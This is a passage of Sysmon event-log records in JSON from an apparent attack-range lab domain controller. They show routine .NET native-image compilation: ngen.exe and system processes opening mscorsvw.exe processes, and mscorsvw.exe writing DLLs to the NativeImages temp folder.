{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:29.794\r\nProcessGuid: {A837DB8D-04FD-5F25-0000-0010FB8B1200}\r\nProcessId: 3804\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\edc-0\\UIAutomationTypes.dll\r\nCreationUtcTime: 2020-08-01 06:00:29.794","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:29.794","ProcessGuid":"{A837DB8D-04FD-5F25-0000-0010FB8B1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\edc-0\\UIAutomationTypes.dll","CreationUtcTime":"2020-08-01 06:00:29.794","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.840\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010D68F1200}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.840","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010D68F1200}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.840\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010D68F1200}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.840","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010D68F1200}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.856\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010D68F1200}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.856","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010D68F1200}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.887\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010A2931200}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.887","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010A2931200}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.887\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010A2931200}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.887","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010A2931200}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.903\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010A2931200}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.903","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010A2931200}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:30.137\r\nProcessGuid: {A837DB8D-04FD-5F25-0000-0010A2931200}\r\nProcessId: 1204\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4b4-0\\WindowsFormsIntegration.dll\r\nCreationUtcTime: 2020-08-01 06:00:30.137","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:30.137","ProcessGuid":"{A837DB8D-04FD-5F25-0000-0010A2931200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4b4-0\\WindowsFormsIntegration.dll","CreationUtcTime":"2020-08-01 06:00:30.137","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.184\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-0010F8981200}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.184","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-0010F8981200}","TargetProcessId":"3772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\